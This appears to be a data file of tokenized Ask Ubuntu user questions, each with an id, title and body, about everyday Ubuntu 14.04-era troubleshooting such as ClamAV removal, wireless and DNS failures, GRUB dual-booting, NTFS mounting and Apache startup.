464536	clamtk problem , i still get version 0.98.1 for the antivirus engine after removing and reinstalling again via terminal	i recently installed clamtk using the software center and apparently i did n't know that there is a bug of some kind that keeps the anti virus engine at version 0.98.1 but i at least have to have 0.98.3 something for the gui update to work , so i removed the clamav and clamtk using this methods : method 1 and this : method 2 then i reinstall using the sudo apt-get install clamav clamtk or something then i input freshclam to update but when updating via terminal i always get the warning antivirus engine version 0.98.1 must be at least 0.98.3 , and i ca n't seem to remove the clamtk an clamav correctly , how do i remover clamav and clamtk completely ? just a copy of the codes in the terminal : emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get -- purge remove clamav clamav-base clamav-daemon clamav-freshclam libclamav2 [ sudo ] password for emmanuel : reading package lists ... done building dependency tree reading state information ... done package 'libclamav2 ' is not installed , so not removed package 'clamav-daemon ' is not installed , so not removed the following packages were automatically installed and are no longer required : libbit-vector-perl libcarp-clan-perl libclamav6 libdate-calc-perl libdate-calc-xs-perl use 'apt-get autoremove ' to remove them . the following packages will be removed : clamav* clamav-base* clamav-freshclam* clamtk* 0 upgraded , 0 newly installed , 4 to remove and 1 not upgraded . after this operation , 3,286 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 176326 files and directories currently installed . ) removing clamtk ( 4.45-1 ) ... purging configuration files for clamtk ( 4.45-1 ) ... removing clamav ( 0.98.1+dfsg-4ubuntu1.1 ) ... removing clamav-freshclam ( 0.98.1+dfsg-4ubuntu1.1 ) ... * stopping clamav virus database updater freshclam /etc/init.d/clamav-freshclam : 346 : kill : no such process [ ok ] purging configuration files for clamav-freshclam ( 0.98.1+dfsg-4ubuntu1.1 ) ... removing clamav-base ( 0.98.1+dfsg-4ubuntu1.1 ) ... purging configuration files for clamav-base ( 0.98.1+dfsg-4ubuntu1.1 ) ... dpkg : warning : while removing clamav-base , directory '/var/lib/clamav ' not empty so not removed processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get remove clamav reading package lists ... done building dependency tree reading state information ... done package 'clamav ' is not installed , so not removed the following packages were automatically installed and are no longer required : libbit-vector-perl libcarp-clan-perl libclamav6 libdate-calc-perl libdate-calc-xs-perl use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get remove -- atuo-remove clamav reading package lists ... done building dependency tree reading state information ... done e : unable to locate package atuo-remove emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get remove -- auto-remove clamav reading package lists ... done building dependency tree reading state information ... done package 'clamav ' is not installed , so not removed the following packages will be removed : libbit-vector-perl libcarp-clan-perl libclamav6 libdate-calc-perl libdate-calc-xs-perl 0 upgraded , 0 newly installed , 5 to remove and 1 not upgraded . after this operation , 12.5 mb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 176192 files and directories currently installed . ) removing libdate-calc-xs-perl ( 6.3-1build1 ) ... removing libdate-calc-perl ( 6.3-1 ) ... removing libbit-vector-perl ( 7.3-1build1 ) ... removing libcarp-clan-perl ( 6.04-1 ) ... removing libclamav6 ( 0.98.1+dfsg-4ubuntu1.1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get purge clamav reading package lists ... done building dependency tree reading state information ... done package 'clamav ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get purge -- auto-remove clamav reading package lists ... done building dependency tree reading state information ... done package 'clamav ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get remove clamtk reading package lists ... done building dependency tree reading state information ... done package 'clamtk ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get remove -- auto-remove clamtk reading package lists ... done building dependency tree reading state information ... done package 'clamtk ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $ sudo apt-get purge -- auto-remove clamtk reading package lists ... done building dependency tree reading state information ... done package 'clamtk ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . emmanuel @ emmanuel-ms-16f1 : ~ $
464537	ubuntu wireless faill to connect	i just reinstalled my ubuntu and it seems like it can not connect to wireless , it sees the network , attemps to connect it but after like 1-2 minutes it gives up . it always has been working fine before . it reconize the ethernet cable when its plugged in but always fail to connect via wi-fi i tryed reinstalling the driver but doesnt change anything ... result after lspci | grep network : 03:00.0 network controller : broadcom corporation bcm43228 802.11a/b/g/n any suggestions ? thanks alot
464539	when i type wget the server seams to be inactive	bird47 @ ubuntubirdcage : ~ $ ls bird47 @ ubuntubirdcage : ~ $ wget http : //dl.bukkit.org/latest-beta/craftbukkit-beta.jar -- 2014-05-11 15:34:02 -- http : //dl.bukkit.org/latest-beta/craftbukkit-beta.jar resolving dl.bukkit.org ( dl.bukkit.org ) ... failed : temporary failure in name resolution . wget : unable to resolve host address `dl.bukkit.org' bird47 @ ubuntubirdcage : ~ $ i am trying to install minecraft bukkit . but i cant reach the server . is it their end or mine ?
464543	how do i use sftp within nautilus ?	since i have migrated to ubuntu 14.04 , i am unable to access sftp through nautilus . if i enter `` sftp : //user @ sshserver '' in nautilus ( ctrl+l ) , i got the error message : sorry , could not display all the contents of “vmalep ( sftp ) ” : the specified location is not supported very confused because it was working with the same server and with the previous version . same problem to access another ssh server laptop in the same lan . thanks in advance for your support ! pierre
464549	why is my sequence is always 1 ?	on my ubuntu server 12 . 04 an usual ping response or result is ping 192.168.1.10 ( 192.168.1.10 ) 56 ( 84 ) bytes of data . from 192.168.1.6 icmp_seq=10 destination host unreachable from 192.168.1.6 icmp_seq=11 destination host unreachable from 192.168.1.6 icmp_seq=14 destination host unreachable for some reason i am not sure of , the response has changed to this ping 192.168.1.10 ( 192.168.1.10 ) 56 ( 84 ) bytes of data . from 192.168.1.6 icmp_seq=1 destination host unreachable from 192.168.1.6 icmp_seq=1 destination host unreachable from 192.168.1.6 icmp_seq=1 destination host unreachable the sequence number is always 1 , no matter how long i leave it to run , unable to connect to any network . and it produces result like this more than usual , i install a centos 05 server on a virtual box on this server and the centos can recieve and send signal through the ethernet port , but the linux server ca n't .
464550	user postgres can not access drive even after permissions and group membership are provided	i have been working on this for the better part of the morning . so i upgraded to ubuntu 14.04 last night , and that went smoothly . but there is an issue with the postgres user and access to my postgresql database data directory . so the database folder is on a separate harddrive . when i mount the drive , the system mounts it to the /media/krishnab/ { drive } folder as per the current udisks2 standard . so now the postgres user has to go through my home directory in order to get to the database folder . i have included the postgres user in my krishnab group and also given the account a linux password . my home folder has `` me '' ( krishnab ) as the owner and group krishnab . i have rebooted the pc a number of times too . however , whenever the postgres user tries to access the /media/krishnab folder there is always a permission denied error . i have also checked my /home/krishnab/ folder permissions to make sure they are good -- krishnab is the group -- and they are fine . i checked the permissions on the folder too and they are drwxrwxr-x+ . so still no luck . the only thing i noticed was that when i use the gnome-system-tools , i do not see the postgres user as a member of the krishnab group , but when i do sudo cat /etc/group i find that the only member of the krishnab group is krishnab : x:1000 : postgres . so i am wondering why myself krishnab is no a member of my own group krishnab . any suggestions ? i ca n't seem to figure out what i am missing . thanks .
464551	apt-get install linux-image-generic without running update-grub ?	is it possible to run apt-get install linux-image-generic without the post install step , update-grub ? i need a repeatable process for a debootstrap image creation process for netbooting where the script that builds everything up may not be running on the same version as what it 's building for . update-grub is an unneeded step .
464554	strange glitches on initial login	after a fresh install of ubuntu 14.04 with full-disk encryption , my computer boots up fairly quickly . when i first log in to my account , four strange glitches happen all at the same time , and all fixed by logging out and back in . the wrong font is displayed in window menus and the clock in the status bar . the display resolution does not adjust to its configured value . the menu bars for windows are sometimes displayed under the title , although they are configured to display in the title bar . the wifi speed is limited and inconsistent , which may be a different glitch as i do have an intel wireless 7260n , which has been reported to have problems in 14.04 . strangely enough , numbers 1 and 2 happened in my previous install , 13.10 , but only after booting from a live usb . i 'm running ubuntu 14.04 lts on a lenovo yoga 2 pro ( the intel i5 processor variant . ) edit : i 've found the problem . what seems to be happening is that i was using the acpi_backlight=vendor flag to start the kernel , which used to be needed to show the screen , but is no longer needed , and so including it was freaking out the system . removing this flag from the grub configuration solved the problem ( and all of its side effects . )
464559	usb flashdrive problem	i 'm new to ubuntu 12.04 ( came from windows xp ) first i could write files to a flashdrive . now it says i do n't have permission . i 'm not a terminal man ( yet ) what did i do wrong and how can i solve this ? tx andries
464564	convert youtube video to playable cd on dvd player ?	i found great videos on youtube and i would like to share them with the family , but my family does not want to watch them crowded together by my computer , but rather would like to watch them in the living room with the dvd player . i have vlc and a cd , but no clue on how to proceed . any suggestions ? thanks .
464566	problems with the installation of ubuntu	hello i have some problems with ubuntu , i change from windows 7 to ubuntu 14.04 ( 64bits version ) i can install ubuntu and start session but when the desktop appears the mouse and the keyboard just do n't work , and some minutes later the screen turns gray so i must turn off the pc . my pc is a hp slime s3241la with 4gb ram . i really expect that somebody can help me 'cause i need work in the week so i need the computer pd : sorry for the english .
464568	network driver is very weak	i am on ubuntu 12.04 and ever since i wiped windows and installed it my wireless connection has been horrible . i have never been this frustrated with any of my computers , i pay for 12 mb/s but am mostly getting around 1 mb/s with ubuntu installed . i know this is not a isp problem as i have only received this problem on ubuntu , my win7 laptop is just fine , network wise . here are the specs for my ubuntu laptop : http : //h10025.www1.hp.com/ewfrf/wc/document ? docname=c03015474 & cc=us & dlc=en & lc=en # n415 if anyone here can help me out i would greatly appreciate it , if not then i would sadly have to go back to windows : ( thanks and keep up the great work ubuntu : )
464569	first time using ubuntu , a few questions	so my gf 's dell inspiron 1545 has had a pirated copy of windows 7 ultimate since we got it ( from her mom and we think her step dad put the pirated copy on it ) she 's sick of having an illegal copy and lately it has been pretty glitchy . we 'd like to put ubuntu on it instead . i do n't have any blank dvds , or a usb drive , but i have my android with a 16gb sd card . is it possible to boot from the android 's sd card instead of a usb drive ? if not , would it be better to us a usb or burn it to a dvd ? let me know if i missed any important info !
464573	vmware player crashes after upgrading to ubuntu 14.04	i have been using vmware player to run windows xp and all went well until i upgraded to ubuntu 14.04 ( from 12.04 ) . now every time i start the vmplayer , win xp boots well , but after about a minute in the virtual machine freezes while outputting the following error : *** error in `/usr/lib/vmware/bin/vmware-vmx ' : malloc ( ) : smallbin double linked list corrupted : 0x0000000001b5d300 *** unexpected signal : 6 . vmplayer version 6.0.2 build-1744117 host os version 3.13.0-24-generic how do i fix this ?
464574	why is my software & updates stuck at one repo ?	when i try and change my download location mirror ( eg . ubuntu.securedservers.com ) , i type in my password and click `` revert '' and it does not save my new location . i 've also attempted to edit the /etc/apt/sources.list file , and upon reboot it is still at my old mirror location . please explain to me how i can fix this ; download speeds are horrid at this location .
464575	left alt combinations with xmodmap	how i can change alt+symbol to some other ? for example , i changed semi-colon like this : keycode 47 = backspace colon semicolon colon semicolon colon but i want alt+ ; to produce ; .
464576	cant get network bridge setup between wlan0 and eth0	i 'm giving linux a try , and my first order of business is establishing the core capabilities that i had with my old windows setup . namely , i 'm trying to bridge my wireless network connection , from a router with internet , over to a wired network . i need the wired network to appear as if it was a normal part of the wired network ... dhcp from the router and addressable from other wireless devices . in windows , it was super easy ... highlight the two network devices and click bridge connections . done . however , i 've spent 5 hours now with no luck trying to replicate the same capability on ubuntu . i 've tried : -the gui network manager -several command line guides however , none offer the detail that i need to really learn from , and unfortunately none work . here 's the topology i 'm trying to go for : router : 192.168.1.1/24 host laptop wireless card : 192.168.1.2/24 ( wlan0 ) host laptop wired card : ( should it be the same address as the wireless card ? ) 192.168.1.9/24 ( what is it 's gateway ? ) i feel like this should n't be as hard as it seems ... thanks
464581	ubuntu 14.04 on vmware dns not working	for reasons , i do n't understand , my internet is not working in ubuntu 14.04 running via vmware . in all probability i think it 's a dns problem as i 'm also not able to ssh into my servers . some immediate help is required
464584	ca n't get netwroked brother mfc-j870dw to print on 14.04 lts	as far as i can tell from running the diagnostic and debug commands for cups the drivers are installed , the printer pings , but the debug log seems to indicate that the printer is not returning a response . the same debug log indicates that another printer ( epson workforce 545 ) on the network does give a response . the epson in fact prints just fine from ubuntu . the brother mfc-j870dw seems installed but when i hit the test page button it cycles from `` idle '' to `` processing '' and back to `` idle '' . it seems that the print job does n't make it into the que . was i supposed to configure something else somewhere ? let me add that i 've tried installing and uninstalling this printer under the various available protocols . i did not reboot after each uninstall , do n't know if that matters . also , i could not figure out what `` resource '' meant in the ipp device uri syntax examples . i.e . ipp : //172.16.1.22/ ? ( resource ) .
464585	kazam is not working	i wanted to answer someones question and realized that i can not use kazam . i go to screenshot , area , and them capture but it will only display the number 5 and will not take the picture . i tried sudo apt-get remove kazam followed by sudo apt-get install kazam but have n't had any luck yet . thank you all for your help .
464586	lubuntu hibernate xfce power manager `` not authorized ''	i have xfce power manager running on lubuntu 14.04 with the setting to hibernate after 15 minutes of computer inactivity . at such time , however , i receive the message : `` not authorized '' . how can this be fixed ?
464588	double lock screen ubuntu 14.04	so i 've got a brandynew system 76 laptop running ubuntu 14.04 , and if i close the lid , putting it to sleep , and reopen it , i am presented with the very nice new unity lock screen . however , when i enter my password , and it succeeds , it then presents me with a second lock screen . where i have to enter my password again , before finally being let into the desktop . hash anyone else seen this sort of behavior ?
464589	xubuntu showing up as ubuntu in grub	i decided before i commit 100 % to a distro that i would dual boot ubuntu and xubuntu and see after some time which `` feels '' better to me . well , after restarting the computer for the first time i saw this screen : i was confused as i saw -two- options for ubuntu . i know that xubuntu is a derivative of ubuntu but why is it showing up as ubuntu ( and not xubuntu ) in grub ?
464590	14.04 , b43 and de regulatory domain	i 'm running 14.04 on a compaq v6000 laptop which has a bcm4311 b/g wireless adapater , using the b43 firmware and proprietary blob ( fwcutter ) . on power-up , seemingly no matter what i do , the regulatory domain ends up being germany . ( i 'm in canada ) . i can use sudo iw reg set ca to force it to canada , but i have n't been able to find a way to make it persistent - it always boots up german . how can i make this setting persistent , or set up some script to automagically change it to ca at the appropriate time during boot ? edit : tried adding regdomain=ca to /etc/default/crda - no luck , and crda complains about 'country not being set ' if i try to call it on its own . iw reg set appears to be the only way to make the change .
464591	can not find grub to boot ubuntu after installation	i use a asus n550jv laptop ( uefi ) and i tried to dual boot 64bit ubuntu 14.04 on it , along side with windows 8 . i have two hard drives and /dev/sdb is a ssd so i want to install ubuntu on it ( windows is also installed on this drive ) . but when the auto installation runs , it tries to install grub on /dev/sda , so it fails . so , i made 30gb unallocated space in windows then used a usb drive with ubuntu iso in it . i partitioned the 30gb space as follows : /boot 100mb ext2 primary / 8192mb ext4 logical /home 20480mb ext4 logical swap the rest of space ( about 4gb ) and i chose /dev/sdb as location to install boot loader . the installation run without reporting any error . but when the installation completed and the system rebooted , grub does not appear in the boot options . i went into boot options in bios and check efi directory and did not find grub either . what shall i do with situation ? thanks in advance . p.s . there actually exists two grub 1.99 in efi partition , which are left by unsuccessful installation of ubuntu 13.10 and debian 7.5 . when i use them , there appears a grub command line , which i have no idea how to use . is this causing the problems ?
464594	accessing windows files on a separate hard drive ( 14.04 )	i 've found information on accessing windows partitions on the same drive that ubuntu is installed on , but not on a totally separate drive with two partitions . the drive does n't show up in my partition editor . windows 7 went totally bonkers on me and wo n't boot , however the drive still functions as it should . my linux drive is a brand new 2tb western digital , my windows drive is a 1 year old seagate 1tb drive . right now the 2tb is master boot , the 1tb is slave boot .
464597	14.04 wifi ca n't connect `` < warn > connection disconnected ( reason -3 ) ''	new install of 14.04 and i ca n't connect to a working wifi network ( `` bricks and scones '' is the access point name in the log below ) . other devices ( eg . the android i 'm using to post this ) connect just fine . i 'm not sure what 's wrong with my configuration . i 'm looking at syslog but still ca n't sort out what 's going wrong . what do these warnings mean ? ryan @ palms /v/log > tail -f syslog | grep -c5 'warn\|error' may 11 18:55:18 palms avahi-daemon [ 730 ] : withdrawing address record for 192.168.1.129 on wlan0 . may 11 18:55:18 palms avahi-daemon [ 730 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.1.129 . may 11 18:55:18 palms avahi-daemon [ 730 ] : interface wlan0.ipv4 no longer relevant for mdns . may 11 18:55:09 palms whoopsie [ 1292 ] : online may 11 18:55:18 palms whoopsie [ 1292 ] : offline may 11 18:55:18 palms networkmanager [ 985 ] : < warn > dns : plugin dnsmasq update failed may 11 18:55:18 palms wpa_supplicant [ 1004 ] : nl80211 : was expecting local disconnect but got another disconnect event first may 11 18:55:18 palms dnsmasq [ 2269 ] : setting upstream servers from dbus may 11 18:55:18 palms networkmanager [ 985 ] : < info > removing dns information from /sbin/resolvconf may 11 18:55:18 palms kernel : [ 806.867681 ] cfg80211 : calling crda to update world regulatory domain may 11 18:55:18 palms kernel : [ 806.873484 ] cfg80211 : world regulatory domain updated : -- may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) starting connection 'bricks and scones guest network' may 11 18:55:18 palms networkmanager [ 985 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] may 11 18:55:18 palms networkmanager [ 985 ] : < info > networkmanager state is now connecting may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... may 11 18:55:18 palms wpa_supplicant [ 1004 ] : wlan0 : ctrl-event-scan-started may 11 18:55:18 palms networkmanager [ 985 ] : < warn > connection disconnected ( reason -3 ) may 11 18:55:18 palms networkmanager [ 985 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . may 11 18:55:18 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... -- may 11 18:55:39 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 11 18:55:39 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 11 18:55:40 palms dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x7609df84 ) may 11 18:55:50 palms dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 13 ( xid=0x7609df84 ) may 11 18:56:03 palms dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 9 ( xid=0x7609df84 ) may 11 18:56:04 palms networkmanager [ 985 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . may 11 18:56:04 palms networkmanager [ 985 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 4231 may 11 18:56:04 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... may 11 18:56:04 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... may 11 18:56:04 palms networkmanager [ 985 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] may 11 18:56:04 palms networkmanager [ 985 ] : < info > networkmanager state is now disconnected may 11 18:56:04 palms networkmanager [ 985 ] : < info > marking connection 'bricks and scones guest network ' invalid . may 11 18:56:04 palms networkmanager [ 985 ] : < warn > activation ( wlan0 ) failed for connection 'bricks and scones guest network' may 11 18:56:04 palms networkmanager [ 985 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . may 11 18:56:04 palms networkmanager [ 985 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] may 11 18:56:04 palms networkmanager [ 985 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] may 11 18:56:04 palms avahi-daemon [ 730 ] : withdrawing address record for fe80 : :3623:87ff : fefd:5b57 on wlan0 . may 11 18:56:04 palms avahi-daemon [ 730 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :3623:87ff : fefd:5b57 . may 11 18:56:04 palms avahi-daemon [ 730 ] : interface wlan0.ipv6 no longer relevant for mdns . may 11 18:56:04 palms wpa_supplicant [ 1004 ] : wlan0 : ctrl-event-disconnected bssid=7e : d1 : c3 : ce:2c:9a reason=3 locally_generated=1 may 11 18:56:04 palms networkmanager [ 985 ] : < warn > connection disconnected ( reason -3 ) may 11 18:56:04 palms wpa_supplicant [ 1004 ] : wlan0 : ctrl-event-scan-started may 11 18:56:04 palms wpa_supplicant [ 1004 ] : nl80211 : was expecting local disconnect but got another disconnect event first may 11 18:56:04 palms networkmanager [ 985 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected may 11 18:56:04 palms kernel : [ 852.988624 ] cfg80211 : calling crda to update world regulatory domain may 11 18:56:04 palms kernel : [ 852.991920 ] cfg80211 : world regulatory domain updated : ( longer one here : http : //pastebin.com/epbp51dz )
464598	how do i enable gnome 3 on ubuntu 14.04 lts ?	it 's been like 10 hours since i got down to ubuntu so you could just say , i 'm a perfect noob for the time being . thing is , i installed or better , tried to install gnome-3 by dropping 3 commands which are apparently everywhere and look like : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install gnome-shell now that far , things were all-ok until i restarted and tried to actually enable gnome . the only way for doing that , which i 've stumbled on is by tapping the tiny icon next to the password box , and supposedly it was to give me `` gnome3 '' or something to go ahead with but there 's nothing of that sort at all . i input my password , i click on the said icon and nothing . i 'm logged in back to unity as alive and boring as ever . so looking forward for anyone to bestow their wisdom upon me . thanks in advance ! p.s : i 'm running ubuntu on vmware 10.0.1 . host os is windows 7
464599	how do i turn off the fn key ?	i got a new keyboard with function keys , but i have to hold the fn key to use the f1|f12 keys normally and not to change the volume , brightness , etc . how do i change this ?
464600	ca n't get monitor image back on after toggling monitor power button	when i toggle monitor power off and on again - it does n't come back to desktop . i see blank screen instead . interestingly - if i type ctrl + alt +f1 - i can get into terminal and then i can get back into desktop by typing : sudo service lightdm restart suspend works normally ( monitor wakes up just fine ) . any ideas ? p.s . xubuntu 14.04 with the most latest updates on gigabyte brix 2 pro
464602	serious problems with speed and lag continually worsening in 14.04	i recently installed 14.04 on a clean hd . 64-bit unity . since the computer is n't mine the specs i do n't currently have on hand , but i can tell you that it should n't be a big problem . the problem ( s ) that i have been experiencing are quite difficult to troubleshoot for , since what i am experiencing is not to my knowledge an explicit error , but rather a usability problem that worsens with each boot . take this particular time that i booted my computer . it took 10 minutes just to get past a blank screen with a cursor . then i saw a second black screen , with a different font , for another 5 minutes . then i saw the default 14.04 background . then i waited another 10 minutes to see the login , then it crashed . so i went through the process again . you get the picture , right ? booting up takes half an hour or more . every other action that i want to perform or program that i want to load is similarly tedious . when i open terminal it takes about 60 seconds to see the username and computer name . my browser freezes about every 20 seconds ... etc . when i installed this new version about 2 weeks ago , the problem was slight and hardly noticable . i did my graphic design work without the slightest wink of difficulty . it has since then started causing problems and continued to worsen and now my computer is hardly usable . is there any way to discover what this might be ? since the problem presents itself upon first booting the computer , i doubt it has anything to do with mal-ware , spy-ware , viruses , etc . perhaps i have the wrong install or maybe the problem is hard-ware related . how can i proceed ? should i just wipe and try a different version ? thanks , an ubunt00n00b
464604	problems with logging-in after installation	alright so i installed ubuntu 14.04 onto my windows 7 computer and installed it instead of win-7 , installation was successful with no problems then after i was prompted to reset it brought me to the log-in screen . when i logged-in successfully and will it was loaded my screen all of the sudden went to this : after i got this problem i went and got a new copy of the iso and put it on a flash , i selected re-install and tried to log-in again after the re-installation , and got the same result ! my graphics card : nvidia geforce 7050 does this mean its my computer and not ubuntu ? can anyone help me ?
464605	how to access and modify files from my windows installation ?	i recently setup my system to dual-boot ubuntu and windows ( keeping windows only to game ... an addiction i just ca n't break . ) anyway , i noticed the /opt and /usr directories were taking up a lot of space on my 32gb ssd , so i decided to move them to my hdd . here 's where the idiot in me took over , i guess . i made the fstab entry first , then rebooted the computer into a gparted installation . well , it turns out i ca n't actually move the files between the hard drives from gparted ( or i simply do not know how . ) so now i 'm stuck in a reboot loop , and the root password is disabled disallowing me from dropping to a root prompt and alleviating the issue myself . what can i do ? i 'm stuck on windows right now .
464610	seeing double vision display	i dumped windows xp using the ubuntu disk ! [ enter image description here ] [ 1 ] on my dell inspiron 1100 . after ubuntu 12.04lts installed and i rebooted , the display of ubuntu seems to repeat itself . so i have two display screens , and each does n't extend to the far right side of the monitor . there is white bar ( i.e. , a blank white space ) between the upper and lower display screens . the lower display shows only the upper half of the top screen ( which is a complete display ) the entire screen also flickers . when i run ubuntu 12.04lts from a dvd ( try ubuntu ) , the screen display is normal ( and no flickering ) . my problem is very similar to a problem asked on 11 march 2012 by macgyver that was answered on 11 march 2012 by amc . i followed the suggested instructions : from the dash , search `` additional drivers '' to check for any display drivers that might need to install . however , i received the following message : `` no proprietary drivers are in use on this system . '' i checked the display settings , but only have one choice , which is `` 640 x 480 '' . i 'm an old newbee ( who once upon a time , wrote programs on punchcards and recycled green paper ) . because i 'm a newbee , i am not allowed to upload a jpg file of the display screen ? thank you ( in advance ) for help .
464611	can not access to a hidden folder	i want to access my database table , which is created in netbeans . i 'm looking for the derby folder : student @ student-virtualbox : ~ $ sudo find / -name derby -print and the terminal responses with : /home/student/.netbeans/6.9/config/preferences/org/netbeans/modules/derby but when i 'm opening the student folder , i can not find any .netbeans folder as shown on the image : http : //postimg.org/image/no3m76flp/ how do i get access to the .netbeans folder ?
464614	windows 7 and ubuntu 14.04	my laptop can hold dual hdds . i have installed windows 7 on one hdd and ubuntu on the other hdd . installation went fine , but windows 7 needs csm on to boot . and ubuntu needs uefi on to boot . is there a way to dual boot these easier ?
464616	my monitor does n't want to display ubuntu . what 's going on ?	just installed ubuntu 12.04 off a cd on a dell poweredge 2650 server . the installation went fine . however , during the first boot up , right after post , my display goes black and my monitor displays the following error mesage : the current input timing is not supported by the monitor display . please change your input timing to 1680x1050 @ 60hz or any other monitor listing timing as per the monitor specifications . has anyone else had this experience ? the monitor is also a dell 19 '' display .
464619	ca n't see files written by ubuntu on ntfs partition from ubuntu	i have dual boot on my laptop with windows8 and ubuntu14.04 . some time ago i copied some files from ubuntu to ntfs partition . now when i start ubuntu these files are not seen in the ntfs partition though partition properties shows space used by these files . the thing is that these files are neither seen from windows nor from ubuntu . can someone help me ... thanks in advance ...
464623	is my cpu capable of running xbmc ?	is my cpu capable of running xbmc ? i am asking this because when on start up xbmc crashes and say something about opengl and say need update . *-display description : vga compatible controller product : 82865g integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : e8000000-efffffff memory : feb80000-febfffff ioport : ed98 ( size=8 )
464625	urgent troubles with screen resolution	i fresh-installed linux-ubuntu and the screen resolution was at 1280x1024 or something close to that ( not my native 1920x1080 ) . i searched how to fix that , tried everything to no avail . i have tried : all of the xrandr commands editing the xorg.conf ctf so i quickly swapped to xubuntu ( for no related reason but now its xubuntu ) i tried : xorg.conf.d 10-monitor gtv ( or gtf ? i 'm forgetful ) errors : the xorgs did not have any errors , they ran smoothly etc but it had no effect . like it was n't there . all of the xrandr commands , however , narrowed themselves down to a failure because it could n't detect my gamma . any help would be awesome . i can provide specifics in a certain area if necessary . sorry for being vague .
464628	can i set a 'nuke ' password for an encrypted secondary drive ?	i have an encrypted 2tb hdd , and i would like to be able to enter a password at the decrypt step of mounting it , that will render the drive un-decryptable . i have seen a few article online about this but i do n't know how to go about doing this . i am hoping someone else on here has already done this sort of thing . i am using ubuntu 14.04 , and i can wipe the drive if i have to , as it is n't holding anything important right now .
464630	unable to access the windows drive in ubuntu 14.04	i am trying to open the e ( called new volume ) drive of windows in ubuntu 14.04 and it gives me this error message error mounting /dev/sda5 at /media/nisarg/new volume : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/nisarg/new volume '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . it used to be perfectly accessible only now its not.what 's wrong ? i logged into windows and did a shutdown as well but the same message crops up . help .
464633	can not start apache	yesterday i updated to 14.04 . apache worked because i could use phmmyadmin . i could n't see my php files because i did n't know that the default location had moved to /var/www/html , which two people have kindly told me . but when i have switched on my laptop today apache seems to not be running . firefox says it can not connect with the server in localhost , and of course phpmyadmin does n't work . i tried to restart apache but i got this answer : action 'start ' failed . the apache error log may have more information . [ fail ] * the apache2 instance did not start within 20 seconds . please read the log files to discover problems i would like to paste the error log here but i do not know where to find it . thank you for any help .
